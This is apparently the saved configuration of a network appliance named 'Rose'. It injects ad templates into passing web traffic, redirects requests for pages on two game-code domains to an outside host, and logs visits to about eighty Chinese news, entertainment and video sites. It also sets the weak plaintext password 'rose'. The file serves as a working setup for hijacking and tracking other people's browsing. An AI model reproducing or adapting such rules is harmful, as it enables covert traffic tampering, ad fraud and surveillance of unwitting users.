!
! Zebra configuration saved from vty
!   2018/01/18 16:09:17
!
hostname Rose
password rose
enable password rose
log file /root/log/naga.log
itf tx enable
itf rx enable
interface 0 enable
interface 1 enable
ad template send single
domain default push
snet default push
adp dmac custom
adp smac custom
adp interval 1
adp switch template pc on
adp switch template mobile off
adp switch on
adp pkt-content eth
ori url add 0 ^y\.code\.17tanwan\.com(.*)\.html redir http://himanibhasin.com/cq.html  10
ori url add 1 ^q\.code\.tanwan\.cn(.*)\.html redir http://himanibhasin.com/cq.html  10
ori url add 30  ^www\.hxnews\.com/$   log
ori url add 31  ^ent\.huanqiu\.com/$   log
ori url add 32  ^www\.huanqiu\.com/$   log
ori url add 33  ^mobile\.huanqiu\.com/$   log
ori url add 34  ^www\.lzep\.cn/$   log
ori url add 35  ^www\.fzbm\.com/$   log
ori url add 36  ^www\.xiumu\.cn/$   log
ori url add 37  ^www\.ifensi\.com/$   log
ori url add 38  ^www\.happyjuzi\.com/$   log
ori url add 39  ^www\.mingxingku\.com/$   log
ori url add 40  ^www\.fensihudong\.com/$   log
ori url add 41  ^bagua\.ifensi\.com/$   log
ori url add 42  ^www\.jianglishi\.cn/$   log
ori url add 43  ^www\.hxnews\.com/$   log
ori url add 44  ^bgl\.shenchuang\.com/$   log
ori url add 45  ^www\.yule\.com\.cn/$   log
ori url add 46  ^www\.57616\.com/$   log
ori url add 47  ^www\.shangc\.net/$   log
ori url add 48  ^www\.ppys\.net/$   log
ori url add 49  ^www\.94hnr\.com/$   log
ori url add 50  ^www\.nvshen\.net/$   log
ori url add 51  ^www\.chengshiw\.com/$   log
ori url add 52  ^www\.12chai\.com/$   log
ori url add 53  ^www\.o-sky\.com/$   log
ori url add 54  ^www\.mifei\.com/$   log
ori url add 55  ^www\.jiankang4\.com/$   log
ori url add 56  ^www\.qiaoyuwang\.com/$   log
ori url add 57  ^www\.ibayue\.com/$   log
ori url add 58  ^www\.ratoo\.net/$   log
ori url add 59  ^ent\.qianzhan\.com/$   log
ori url add 60  ^www\.yangsheng\.com/$   log
ori url add 61  ^www\.menworld\.org/$   log
ori url add 62  ^www\.1234wu\.com/$   log
ori url add 63  ^www\.douquwang\.com/$   log
ori url add 64  ^www\.022ee\.com/$   log
ori url add 65  ^www\.ifensi\.com/$   log
ori url add 66  ^www\.akjunshi\.com/$   log
ori url add 67  ^www\.hongfen\.org/index\.html   log
ori url add 68  ^www\.365qilu\.com/$   log
ori url add 69  ^www\.nrxiu\.com/$   log
ori url add 70  ^www\.86mv\.com/$   log
ori url add 71  ^www\.0245\.org/$   log
ori url add 72  ^www\.cnliti\.com/index\.html   log
ori url add 73  ^www\.tianya999\.com/$   log
ori url add 74  ^www\.dushe\.net/$   log
ori url add 75  ^www\.zahuishi\.com/$   log
ori url add 76  ^www\.juqingba\.cn/$   log
ori url add 77  ^www\.ppys\.net/$   log
ori url add 78  ^www\.80dyy\.cc/$   log
ori url add 79  ^www\.100shuai\.com/$   log
ori url add 80  ^juji123\.com/$   log
ori url add 81  ^v\.shcaoan\.com/$   log
ori url add 82  ^www\.bjxyxd\.com/$   log
ori url add 83  ^dnf\.tgbus\.com/$   log
ori url add 84  ^ent\.qianzhan\.com/$   log
ori url add 85  ^www\.wudage\.com/$   log
ori url add 86  ^www\.haokoo\.com/$   log
ori url add 87  ^www\.365j\.com/$   log
ori url add 88  ^nv\.99\.com\.cn/$   log
ori url add 89  ^www\.5011\.net/$   log
ori url add 90  ^www\.7791\.com\.cn/$   log
ori url add 91  ^www\.jcku\.com/$   log
ori url add 92  ^www\.cnwav\.com/$   log
ori url add 93  ^www\.9upk\.com/$   log
ori url add 94  ^yl\.szhk\.com/$   log
ori url add 95  ^www\.happyjuzi\.com/$   log
ori url add 96  ^news\.yongkao\.com/$   log
ori url add 97  ^www\.kimiss\.com/$   log
ori url add 98  ^www\.onlylady\.com/$   log
ori url add 99  ^v\.256\.cc/$   log
ori url add 100 ^www\.dytt8\.net/$   log
ori url add 101 ^www\.dy2018\.com/$   log
ori url add 102 ^www\.hanju\.cc/$   log
ori url add 103 ^www\.y3600\.com/$   log
ori url add 104 ^www\.meijutt\.com/$   log
ori url add 105 ^www\.zhuixinfan\.com/$   log
ori url add 106 ^donghua\.dmzj\.com/$   log
ori url add 107 ^comic\.kukudm\.com/$   log
ori url add 108 ^www\.dm5\.com/$   log
ori url add 109 ^www\.1kkk\.com/$   log




interface bussiness add eth1
!
line vty
!
